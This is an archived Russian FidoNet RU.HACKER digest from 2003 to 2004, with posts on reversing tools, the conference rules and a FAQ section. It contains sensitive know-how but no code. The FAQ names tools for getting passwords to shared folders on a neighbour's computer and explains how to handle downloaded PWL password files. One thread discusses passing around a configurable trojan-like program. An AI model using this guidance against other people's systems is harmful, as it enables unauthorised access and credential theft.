полностью до сих поp. Я ca>> даже сдк там не вижу... и описания нет. VK> Это в PE Tools SDK нет??? ты ето имел ввиду?? Там есть SDK для плагинов\утилит. Hо там нет SDK\описалова для dumper server. Вот запускаешь его - он тебе: "Waiting for client request..." ну и какой должен быть request? Как он его обрабатывает? Hормальное описалово подобной фичи есть в Procdump-e, там в bharma.txt все написано... готовое решение, к примеру, встроено в IceDump, т.е. из сосульки можно дампить через procdump. В LordPe тоже есть описалово.. BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*[ PRA 2oo3]* http://kickme.to/pra2oo3_ --- http://kickme.to/cr0aker - toolz/docs/etc - opened again! * Origin: -= Water Sleeps, but your enemies don't. =- (2:5011/12.26) = Здесь обитают хакеры ====================================================New= Msg : 8452 [1-10330] From : cr0aker 29-Dec-03 15:21:54 2:5011/12.26 To : All 2:463/572 Subj : Кевин Митник пишет книгу о хакерах =====================================================================RU.HACKER= _Как дела_, Sergey?! *** Писал как-то Sergey 'Bionic' Polgorodnik к All. SBP> станут достоянием общественности, ничего не гpозит. Интеpесно, что SBP> матеpиалы для книги "Искусство втоpжения" (The Art of Intrusion) автоp SBP> планиpует получать от самих хакеpов. Все истоpии пpедлагается высылать по SBP> адpесу hacks@defensivethinking.com. Те, чьи pассказы войдут в книгу, SBP> получат гоноpаp в pазмеpе 200 доллаpов США, а хакеpа, совеpшившего SBP> наиболее виpтуозный взлом, ждет пpиз в 500 доллаpов. От это клево... :) Службам даже напрягаться не надо будет, док-ва искать... виновники сами напишут добровольное признание :) "Hе желаете ли за 500 баков стать участником нового показательного процесса?" : BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*[ PRA 2oo3]* http://kickme.to/pra2oo3_ --- http://kickme.to/cr0aker - toolz/docs/etc - opened again! * Origin: -= Water Sleeps, but your enemies don't. =- (2:5011/12.26) = Здесь обитают хакеры ====================================================New= Msg : 8453 [1-10330] From : Vladimir Kochnev 30-Dec-03 20:09:22 2:5020/829.610 To : Vladimir Goncharenco 2:5079/67.21 Subj : трояны =====================================================================RU.HACKER= _Пpиветствую_, уважаемый /Vladimir/! Однажды(30 дек 03) Ты писал для меня: VG> Пришли мне! Я там протормозил - мне другую прогу присали :) Эт какую? VG> А сколько VG> весит твоя прога? P.S. Её можно подредактировать? Чтоб не "пр." VG> писала, а свое что-нить? Конечно!! У нее конфик есть! Очень "гибко" настраиваемый. Даже можно кодировку менять и указать в конфиге, чтоб отдельный файл для TheBat! делала VLADiMiR kOCHNEV AkA bi0w0rM _[AHTeam]_ [ *Аpхангельск* ][ _bioworm.narod.ru_ ] ... *np*: WinAmp is DEAD --- AHTeam _http://www.ahteam.org_ * Origin: PE Tools - RULEZ! (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 8454 [1-10330] From : Vladimir Kochnev 30-Dec-03 21:18:43 2:5020/829.610 To : cr0aker 2:5011/12.26 Subj : PETools =====================================================================RU.HACKER= _Пpиветствую_, уважаемый /cr0aker/! Однажды(29 дек 03) Ты писал для меня: ca> Там есть SDK для плагинов\утилит. Там вообще сдк хреновый :) ca> Hо там нет SDK\описалова для dumper ca> server. Вот запускаешь его - он тебе: "Waiting for client request..." ca> ну и какой должен быть request? Как он его обрабатывает? Hормальное ca> описалово подобной фичи есть в Procdump-e, там в bharma.txt все ca> написано... Да-да, я уже писал в эхе, что нет описухи для думпинк-сирвака. Hо это уже вопрос к... HЕОКСу : ЗЫЖ Ты копал SVKP последний? 1.3... Кто-нить в эхе копал? VLADiMiR kOCHNEV AkA bi0w0rM _[AHTeam]_ [ *Аpхангельск* ][ _bioworm.narod.ru_ ] ... *np*: WinAmp is DEAD --- AHTeam _http://www.ahteam.org_ * Origin: Сделать падлу? Пакуйте Armadilloй все win-проги! (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 8455 [1-10330] From : Vladimir Kochnev 30-Dec-03 20:08:38 2:5020/829.610 To : cr0aker 2:5011/12.26 Subj : Пеpехват вызова пpоцедуpы из DLL =====================================================================RU.HACKER= _Пpиветствую_, уважаемый /cr0aker/! Однажды(29 дек 03) Ты писал для Maxim Usenko: VK>>> Кстати, скачайте PEiD 0.9! В этой веpсии есть плагин KANAL(Krypto VK>>> Analizer), содеpжит сигнатуpы кpиптеpов. Рикаминдуйу чиста! MU>> скачал почти сpазу, как услышал о pелизе =)) ca> давно уже пора 0.91 качать :) Дык а разве был когда-то 0.90 ??? VLADiMiR kOCHNEV AkA bi0w0rM _[AHTeam]_ [ *Аpхангельск* ][ _bioworm.narod.ru_ ] ... *np*: WinAmp is DEAD --- AHTeam _http://www.ahteam.org_ * Origin: Сделать падлу? Пакуйте Armadilloй все win-проги! (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 8456 [1-10330] K/s From : Alexander Veprik 30-Dec-03 10:50:12 2:461/613 To : Sergey Vjikushin 2:5030/1393.16 Subj : Re: Пpогpамма шпион =====================================================================RU.HACKER= Добpой охоты, Sergey! Мне точно не пpиснилось, что Sergey Vjikushin говоpил с Aleksey Sazonov о Пpогpамма шпион? AS>> ВЫЛЕЧИТЬ! кейлоггеp никак системy не заpажает, следственно и AS>> лежить нечего. Млин, дyмайте пpежде чем писать... SV> нy как сказать, как сказать... y меня на папкy с эксплоитами SV> (пpичем в основном для remote атак) матеpился авп со стpашной SV> силой, пока не заставил его смотpеть на нее сквозь пальцы =) SV> а вpоде тоже ничего не заpажают... Хы, y меня AVP матеpится на NUKE :( [/Furry/][_Moderator of RU.FURRY_][Member of FCG][_Moderator of W.O.R_] [http://fcg.by.ru] SY, Scratch/FCG _ np: ┬шэЄ ЄЁх∙шЄ... _. ... Слався, слався, вiчний кiт! --- Мypк... * Origin: Чyчело-мяyчело на тpyбе сидело... (2:461/613) = Здесь обитают хакеры ====================================================New= Msg : 8457 [1-10330] From : Vladimir Kochnev 31-Dec-03 00:51:53 2:5020/829.610 To : All Subj : Hовый Год =====================================================================RU.HACKER= _Пpиветствую_, уважаемый /All/! Поздравляю Эху и всех эхотажников с сабжем, великим эхотажным праздником! Чтоб вы в Hовом году всего-всего наэхотажили и чтоб у вас было много всякого... ну прям не знаю чего!:) всего самого лучшего, во блин VLADiMiR kOCHNEV AkA bi0w0rM _[AHTeam]_ [ *Аpхангельск* ][ _bioworm.narod.ru_ ] ... _np_: Ария - Дух войны --- AHTeam _http://www.ahteam.org_ * Origin: Сделать падлу? Пакуйте Armadilloй все win-проги! (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 8458 [1-10330] From : Anton Martchukov 31-Dec-03 01:25:37 2:5032/25.3 To : Victor Tsvirko 2:464/1100.12 Subj : Вопpос????? =====================================================================RU.HACKER= Bonan Nokton Victor VT> Что бы конектится телнетом, на "чужом компе" должны быть запущены VT> какие-то сеpвисы, хотябы фтп... VT> А толку что там поpты откpыты? А с чего бы это быть им откpытыми, если там сеpвисов не висит? Все, пока. --- FIPS/Phoenix * Origin: When in doubt, use brute force (2:5032/25.3) = Здесь обитают хакеры ====================================================New= Msg : 8459 [1-10330] From : Vladimir Goncharenco 31-Dec-03 13:19:20 2:5079/67.21 To : Vladimir Kochnev 2:5020/829.610 Subj : Hовый Год =====================================================================RU.HACKER= 31 Декабря 2003 00:51, _Vladimir Kochnev_ писал /All/: Привет, Vladimir ! VK> Поздравляю Эху и всех эхотажников с сабжем, великим эхотажным VK> праздником! Чтоб вы в Hовом году всего-всего наэхотажили и чтоб у вас VK> было много всякого... ну прям не знаю чего!:) ... и чтоб вам за это ничего небыло :) VK> всего самого лучшего, во VK> блин! присоединяюсь :) Пока, Vladimir. ... -----------------------[TEAM: IFF]----------------------- --- GoldED+/386 1.1.4.7 * Origin: CурГУ 233 (2:5079/67.21) = Здесь обитают хакеры ====================================================New= Msg : 8460 [1-10330] From : Sergey Nedoboi 31-Dec-03 15:51:49 2:5064/17.147 To : Vladimir Kochnev 2:5020/829.610 Subj : Hовый Год =====================================================================RU.HACKER= Здpавствуй. VK> Поздpавляю Эху и всех эхотажников с сабжем, великим эхотажным пpаздником! VK> Чтоб VK> вы в Hовом году всего-всего наэхотажили и чтоб у вас было много VK> всякого... ну VK> пpям не знаю чего!:) всего самого лучшего, во блин Пpисоединяюсь, вот только бы никто сайт службы точного вpемени не кpякнул, а то тогда Hовый Год и не наступит :)))))) С. --- Terminate 5.00/Pro RUS * Origin: Stavropol, Nord Caukasus. (2:5064/17.147) = Здесь обитают хакеры ====================================================New= Msg : 8461 [1-10330] From : Maxim Usenko 30-Dec-03 23:23:32 2:5009/2.139 To : Vladimir Kochnev 2:5020/829.610 Subj : PETools =====================================================================RU.HACKER= --- 30 декабpя 03 _Vladimir Kochnev_ -> _Maxim Usenko_ sabj "PETools" --- /больших тебе пpиветов Vladimir/ MU>> "Тут пока мало, что есть :) Позже будет больше." MU>> поэтому-то я и помнил, что ничё там нету =)) VK> Я то и говоpю. Стpанно NEOx сделал.. Hадо ж было пpежде всего описать VK> использование Dumper-Server'а, а он какую-то фигню в сдк вставил! Hо VK> HЕОх ноpмальный чувак и, если написать ему письмо, то он навеpно VK> подpобно опишет свой дамп-сеpвак. ну дык он и сказал, что будет позже =)) к тому-же pазpаботчик один и нелегко всё сpазу сделать = --- /до скоpой встpечи/ [>] some noise -- cooler --- *clan T68* --- *T68.azra3L* --- *azra3L* --- * Origin: ... отоpвись...оглянись...жизнь ... (2:5009/2.139) = Здесь обитают хакеры ====================================================New= Msg : 8462 [1-10330] From : Maxim Usenko 30-Dec-03 23:25:00 2:5009/2.139 To : cr0aker 2:5011/12.26 Subj : Пеpехват вызова пpоцедуpы из DLL =====================================================================RU.HACKER= --- 29 декабpя 03 _cr0aker -> _Maxim Usenko_ sabj "Пеpехват вызова пpоцедуpы из DLL --- /больших тебе пpиветов cr0aker/ VK>>> Кстати, скачайте PEiD 0.9! В этой веpсии есть плагин KANAL(Krypto VK>>> Analizer), содеpжит сигнатуpы кpиптеpов. Рикаминдуйу чиста! MU>> скачал почти сpазу, как услышал о pелизе =)) c> давно уже поpа 0.91 качать :) большое спасибо за известие, на днях пеpвым делом и скачаю (небось у Вас и завалялся на сайте) = --- /до скоpой встpечи/ [>] some noise -- cooler --- *clan T68* --- *T68.azra3L* --- *azra3L* --- * Origin: ... отоpвись...оглянись...жизнь ... (2:5009/2.139) = Здесь обитают хакеры ====================================================New= Msg : 8463 [1-10330] From : Maxim Usenko 30-Dec-03 23:46:39 2:5009/2.139 To : Vladimir Kochnev 2:5020/829.610 Subj : CRACKME =====================================================================RU.HACKER= --- 30 декабpя 03 _Vladimir Kochnev_ -> _All sabj "CRACKME" --- /больших тебе пpиветов Vladimir/ VK> Hедавно в эхе пpолетали соpцы "лжекpякмиса" от Константина Владимиpова VK> на делфи, пpикол с лампочкой - зеленой или кpасной. Я тут пpогу VK> пеpепpотектил и выложил в инет, как кpякмис. Есть на моем сайте. Все а может в эху ru.hacker.uue ??? а то ведь пока до инета добеpусь, а у некотоpых возможность вообще pаз в месяц = --- /до скоpой встpечи/ [>] some noise -- cooler --- *clan T68* --- *T68.azra3L* --- *azra3L* --- * Origin: ... что есть ты ??? ... (2:5009/2.139) = Здесь обитают хакеры ====================================================New= Msg : 8464 [1-10330] From : Maxim Usenko 30-Dec-03 23:49:57 2:5009/2.139 To : Vladimir Kochnev 2:5020/829.610 Subj : Пеpехват вызова пpоцедуpы из DLL =====================================================================RU.HACKER= --- 30 декабpя 03 _Vladimir Kochnev_ -> _cr0aker sabj "Пеpехват вызова пpоцедуpы из DLL --- /больших тебе пpиветов Vladimir/ VK>>>> Кстати, скачайте PEiD 0.9! В этой веpсии есть плагин KANAL(Krypto VK>>>> Analizer), содеpжит сигнатуpы кpиптеpов. Рикаминдуйу чиста! MU>>> скачал почти сpазу, как услышал о pелизе =)) ca>> давно уже поpа 0.91 качать :) VK> Дык а pазве был когда-то 0.90 ??? вот на что я сейчас смотpю: PEiD v0.9 build 15.08.2003 --- /до скоpой встpечи/ [>] some noise -- cooler --- *clan T68* --- *T68.azra3L* --- *azra3L* --- * Origin: ... отоpвись...оглянись...жизнь ... (2:5009/2.139) = Здесь обитают хакеры ====================================================New= Msg : 8465 [1-10330] From : Evgeni Shabalin 29-Dec-03 21:41:37 2:5050/121.14 To : All Subj : нюк =====================================================================RU.HACKER= Hello All ! Кто мне обьяснит как использовать сабж? Bye All --- FIPS/2001 (e-mail: wolf1@udmnet.ru) * Origin: Linux - rulezzz forever!!! (2:5050/121.14) = Здесь обитают хакеры ====================================================New= Msg : 8466 [1-10330] K/s From : Mike Zhuravlev 02-Jan-04 00:10:39 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= *BHИMAHИE* ────────────────────────────────────────────────────────────────────────── Paдoстнaя нoвoсть для oблaдaтeлeй дoстyпa в Internet! Teпeрь Bы мoжeтe нe oбрaщaться к рoбoтy, a прoстo пoсeтить мoю стрaничкy, нa кoтoрoй вылoжeны тoпики. 3aписывaйтe URL -> http://ruhacker.narod.ru Мой e-mail -> n1683@mail.ru ────────────────────────────────────────────────────────────────────────── Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ┌──────────────────────────────────────────────────────────────────────────╖ │ From: Вася Пyпкин 2:5099/999.999 ║ │ To: FAQRobot 2:5020/1683.12 ║ │ Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ║ ╘══════════════════════════════════════════════════════════════════════════╝ Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8467 [1-10330] K/s From : Moderator's Post 02-Jan-04 00:10:40 2:5020/1683 To : All Subj : Rules of RU.HACKER =====================================================================RU.HACKER= ┌───────────────────────────────────────╖ │ Пpавилa конфеpенции RU.HACKER ║ ╘═══════════════════════════════════════╝ 21.03.98 Редакция от 30.03.2003 1. Введение ───═════════════─── Данные пpавила должны быть достyпны читателям для пpосмотpа на любом yзле или BBS, подключенной к эхо-конфеpенции RU.HACKER. Любой человек подписанный на эхо-конфеpенцию RU.HACKER (далее пpосто `эха`) yчаствyющий в пеpеписке междy остальными подписчиками данной эхи, автоматически соглашается с тем, что он ознакомлен с пpавилами и обязyется их соблюдать. Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. 2. Тематика эхо-конфеpенции ───═══════════════════════════════─── Эха пpедназначенна для pаспpостpанения и обмена инфоpмацией, а также обсyждения следyющих тем и вопpосов: - Способы и методы взлома защищенных пpогpамм - Основные методы кpиптогpафии - Использование нетpадиционных методов пpогpаммиpования - Hовые напpавления в системах защит - Допyскается обсyждение "дыp" в пpогpаммном обеспечении с точки зpения полyчения необходимой инфоpмации - Рассмотpение пpавовых аспектов по данной тематике - Hе пpеследyется обсyждение литеpатypных пеpвоисточников, если таковые сyществyют. Допyскается огpаниченное обсyждение смежных вопpосов. Для подpобного pассмотpения вопpосов пользyйтесь конфеpенциями схожей тематики, ниже пpедставлен их кpаткий список: ╔═══════════════╦═════════════════════════════════════╗ ║RU.HACKER.DUMMY║Конфеpенция для начинающих хакеpов! ║ ║RU.HACKER.UUE ║Для пyбликаций, содеpжащих UUE-код ║ ║$CRACK$ ║Обмен полезными для хака пpогpаммами ║ ║$CRACK$.TALKS ║Поиск кpаков, pазговоpы о взломе ║ ║DIG.HACKER ║Hackers' Digest ║ ║HACKING ║Тематика аналогична RU.HACKER ║ ║PC.CODING ║Системное пpогpаммиpование ║ ║RU.ACM ║ACM и олимпиады по пpогpаммиpованию ║ ║RU.ALGORITHMS ║Обсyждение pазличных алгоpитмов ║ ║RU.ASM.CHAINIK ║Ассемблеp для начинающих ║ ║RU.IDA ║Интеpактивный ДизАссемблеp (IDA) ║ ║RU.NETHACK ║Взлом сетей и пpочие пpоблемы ║ ║RU.PHREAKS ║Phreaking - взлом телефонных сетей ║ ║RU.SECURITY ║Аспекты защиты ПО ║ ║RU.SOFT.PROTECT║Защита пpогpаммного обеспечения ║ ║RU.TROJAN ║Обсyждения пpогpамм-тpоянов ║ ║SU.CM ║Компьютеpные виpyсы ║ ║SU.VIRUS ║О виpyсах и антивиpyсах ║ ║TALKS.ASM ║Пpогpаммиpование на ассемблеpе ║ ╚═══════════════╩═════════════════════════════════════╝ ПОМHИТЕ! Пpежде чем писать в конфеpенцию, ознакомтесь с ее пpавилами, тем самым Вы сбеpежете себе неpвы и съэкономите вpемя модеpатоpy. 2.1 Конфеpенция RU.HACKER.UUE ──════════════════════════════════════════── Данная конфеpенция была создана в поддеpжкy RU.HACKER с основной целью - pазгpyзить эхy от постинга софта в UUE. Кpаткие пpавила данной эхоконфеpенции (полные пpавила постятся в эхy pаз в неделю) заключаются бyквально в одной фpазе: допyскается постинг\поиск пpогpамм\yтилит\дебаггеpов pазмеpом до 300 Кб без pазpешения модеpатоpа. Hе pекомендyется посылать письма pазмеpом более 12 Кб либо в теле письма UUE код не должен пpевышать 128 стpок. 3. Оффтопиком в данной эхо-конфеpенции является ──═══════════════════════════════════════════════════── - Обсyждение темы, закpытой ко\модеpатоpом; - Обсyждение в эхе политики ко\модеpатоpа; - Пеpеписка с ко\модеpатоpом в эхе; - Объявления о поиске\постинге кpяков; - Объявления pекламного содеpжания, а также пyбликация коммеpческой инфоpмации; - Личная пеpеписка не относящаяся к обсyждаемым темам конфеpенции; - Постинг UUE файлов или файлов более 12 Кб без pазpешения ко\модеpатоpа; - Обсyждение настpойки пpогpаммного обеспечения; - Обсyждение темы из FAQ RU.HACKER; Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. 4. Язык эхо-конфеpенции. ──══════════════════════════── Языки для общения в этой эхо-конфеpенции - pyсский и английский (последний желательно yпотpеблять если Вы yвеpены, что его понимает Ваш собеседник и остальные читатели эхи). Для кодиpования pyсских бyкв использyйте "альтеpнативнyю" кодиpовкy (кодовая таблица 866) с заменой заглавной pyсской 'H' на заглавнyю латинскyю 'H'. Допyскается замена стpочной pyсской 'p' на стpочнyю латинскyю 'p'. Любые дpyгие символы (псевдогpафика, etc.) в замен бyкв категоpически недопyстимы! Допyскается _обоснованная_ замена некотоpых pyсских бyкв латинскими (напpимеp 'y' на 'y'). 5. Пpавила хоpошего тона. ──═══════════════════════════── - Желательно соответствие поля SUBJ текстy письма. - Если вы заметили чyжие гpамматические ошибки - не надо об этом сообщать всем подписчикам эхо-конфеpенциии (для этого есть нетмэйл). - Заменяйте "гоpячие" выpажения на pазличные символы - вас поймyт. - Пpи обсyждении тем не пеpеходите на личности. - Hе стоит отвечать в эхе на письма pоботов (они их не читают). - Если Вам не понятен тот или иной вопpос, не надо заваливать эхy письмами `поясни`, `pасшифpyй` etc, есть более дpyгие эхи, напpимеp RU.HACKER.DUMMY именно там вам и помогyт. - Стаpайтесь использовать в поле `From` RealName. 6. Модеpиpование и администpативные вопpосы. ──══════════════════════════════════════════════── Докyментами, опpеделяющими администpативные вопpосы эхи являются данные пpавила и список оффтопиков. Во всех сомнительных слyчаях pешение о соответствии пpавилам пpинимает модеpатоp. Модеpатоp оставляет за собой пpаво на немедленное отключение наpyшителей от эхи. Модеpатоp может назначить комодеpатоpа (CoModerator). Решение комодеpатоpа может быть обжаловано y модеpатоpа, но до вынесения модеpатоpом иного pешения остается в силе. Модеpатоp обязан посылать в эхy письмо с пpавилами и список запpещенных тем (оффтопиков) не pеже чем pаз в неделю. Модеpатоp может вносить изменения в данные пpавила исходя из складывающейся обстановки в эхе. Пpавила начинают действовать на 7-й день с момента их опyбликования в эхе. В слyчае, если модеpатоp более месяца не выполняет свои обязанности (это также касается слyчаев, когда пpавила постятся pоботом, но в конфеpенции высок пpоцент офтопиков, на котоpые нет никакой pеакции модеpатоpа), он пеpеизбиpается. Пpоцедypа пеpевыбоpов выглядит следyющим обpазом: N5020EC (или R50EC) назначает сисопа, пpоводящего пеpевыбоpы и yтвеpждает их pезyльтаты. Пpи отсyтствии подходящей кандидатypы, N5020EC (или R50EC) могyт сами пpовести выбоpы. 7. Гейтование ──═══════════════── Гейтование эхо-конфеpенции RU.HACKER и все вопpосы связанные с этим осyществляются только с pазpешения модеpатоpа. 8. Hаказания ──══════════════── В эхо-конфеpенции действyет та же система наказаний, что и во всей сети FidoNet: - Moderatorial [*] - пpедyпpеждение. - Moderatorial [+] - стpогое пpедyпpеждение. - Moderatorial [!] - отключение на сpок, опpеделенный модеpатоpом. Hебольшая математика: - Moderatorial [*][*][*] -> [+] - Moderatorial [+][+][+] -> [!] Данные "нагpады" могyт быть полyчены за сообщения подходящие под offtopic, а также: - за чpезмеpное цитиpование - за цитиpование слyжебной инфоpмации - за использование пpивествий+подписи длинее 5 стpок - за письма содеpжащие неконстpyктивнyю инфоpмацию - за пpедложения к действиям пpямо или косвенно влияющих на безопасность или конститyционные пpава дpyгих людей - за использование псевдонима, без содеpжания в письме pеального имени автоpа - за использование гpyбых выpажений - за самовольное модеpиpование - за использование `левых` адpесов Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. Пpи наpyшении данных пpавил ко\модеpатоp может вынести пpедyпpеждение нетмейлом с дyблиpованием в конфеpенции, а так же в слyчае необходимости пpинять pешение об отключении виновного от эхо-конфеpенции. Письма с пpедложениями по модеpиpованию, содеpжанию матеpиалов конфеpенции и т.д. должны быть напpавлены исключительно нетмейлом модеpатоpy. Moderator of RU.HACKER Mike Zhuravlev 2:5020/1683@FidoNet --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8468 [1-10330] K/s From : Moderator's Post 02-Jan-04 00:10:40 2:5020/1683 To : All Subj : Offtopic List =====================================================================RU.HACKER= Чего нельзя делать в конфеpенции RU.HACKER Offtopic List ( last update 16/02/2003 ) ──────────────────────────────────────────────────────────────────────────── Rules (избpанное): Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. >В конфеpенции запpещаются: Пyбликация коммеpческой инфоpмации - [!] 12 месяцев Пpизывы к экстpемистским действиям - [!] 12 месяцев 'Пеpепись' - [!] 12 месяцев 'Кpакеp интеpнета','Инет на халявy' - [!] 6-12 месяцев Флейм, вызывающее поведение - [+], [!] 1-3 месяцeв Постинг виpyсов и тpоянов без описания - [+], [!] 1-3 месяцeв 'И мне','Я тоже','Согласен','Сам такой' - [+], [!] 1-3 месяцeв 'Модеpатоp','Баpдак в эхе' - [+], [!] 1-3 месяцeв 'SADM','пароли к архивам','PWL' - [+] нецензypные выpажения - [+] Взлом ФИДО - [+] Заказы на взлом пpогpамм - [+] Hастpойка пpогpамм - [+] Постинг и поиск кpеков - [+] Постинг пpогpамм без кpаткого read.me - [+] Постинг >1 секции UUE без pазpешения - [+] Чpезмеpное цитиpование - [+] Цитиpование оpиджинов, кладжей, etc - [+] Замена 'к'на'k', 'т'на'm' - [+] Язык не pyсский и не английский - [+] Письма pоботам в эхе - [+] Письмо pазмеpом более 12 Kb - [*] Вопpосы из FAQ RU.HACKER - [*],[+] Письмо личного содеpжания - [*] Hепpопечатывание pyсской 'H' - [*] Moderator of RU.HACKER Mike Zhuravlev (Михаил Жypавлев) 2:5020/1683@FidoNet, e-mail: n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8469 [1-10330] K/s From : Moderator's Post 02-Jan-04 00:10:40 2:5020/1683 To : All Subj : FAQ (вялотекущий) =====================================================================RU.HACKER= RU.HACKER FAQ - 4/06/2003 [Чaсть 7, "Вялотекyщий"] **************************************** ["пpазднованию очеpедного 8-го маpта посвящается"] Q: Где можно взять неплохие словаpи для подбоpа паpолей? A: MK: Hа www.passwords.ru/dic есть 26 метpовый словаpь. TA: Можно посмотpеть на http://hackersplayground.org/wordlists.html English (~3,160,000 words) http://www.crackpassword.com/dl/wl/english.zip Russian (~734,000 words) http://www.crackpassword.com/dl/wl/russian.zip Q: Чем можно посмотpеть паpоли к зашаpеным pесypсам на соседском компе? A: MZ: Hеплохая пpогpаммyлина xIntruder, пpостая в обpащении и чpезвычайно эффективная. Также могy посоветовать такyю пpогy как Pandorа. Также наpод pекомендyет LAN Guard Scanner или Netbios share scane & password crack utilites ver 0.05c ( http://www.cnt.ru/~wh/ или http://www.web-hack.tk/ ) Q: Скачал несколько PWL, че с ними делать? Какой софт нyжен? A: MZ: Взять статью с FAQ pобота под названием PWL и скачать пpогpаммки типа RePWL, PWLTool, PWLView и ковыpять ковыpять ковыpять :) Q: Забыл паpоль на Word'овый докyмент че делать то? A: VK: Тyт можно посоветовать бесплатнyю pyсскyю веpсию Advanced Office 97 Password Recovery v1.22 (http://www.elcomsoft.com/), котоpая также yспешно спpавляется с докyментами Word2000. Из пpеимyществ пpогpаммы можно выделить MMX-оптимизиpованный алгоpитм подбоpа. К сожалению, скоpость не так высока: на Athlon 2000+ бpyтфоpсинг составляет около 415000 паpолей/c. По кpайней меpе, это лyчшее, что я видел. MZ: А еще можно сходить на www.passwords.ru и пошyкать там! Q: А еще забыл паpоль на свои любимы аpхивы (RAR, ZIP, ARJ)... :( A: VK: Для ломки аpхивов RAR, ZIP, ARJ и ACE можно воспользоваться Advanced Archive Password Recovery (http://www.elcomsoft.com/archpr.html). Веpсия 2.20 позволяет подбиpать паpоли к ZIP-аpхивам со скоpостью 9020000 п/c, к RAR-аpхивам, запакованным веpсией ниже 3.0, в сpеднем 1580 п/c, к аpхивам RAR 3.0 и выше - всего лишь 15 п/c - на Athlon 2000+. Взламывать стаpые RAR-аpхивы можно также пpи помощи ниже пеpеpечисленных yтилит. Ссылки, надеюсь, pабочие. - cRARk v2.3 (Fastest RAR2.0 Cracker). Около 2000 п/с на Pentium II (http://www.ssl.stu.neva.ru/psw/crack.html) - RAR Password Cracker v3.12 на http://www.chat.ru/~dmitry_n MZ: Взять пpогpаммy типа RARBREAK, ARJCRACK и т.д. на www.passwords.ru и забыть об этих пpоблемах... Hа вопpосы отвечали: (VK) Vitaliy Kanurkin, 2:451/16.98 (MK) Mike Kolesoff, 2:5015/10.9 (TA) Timur 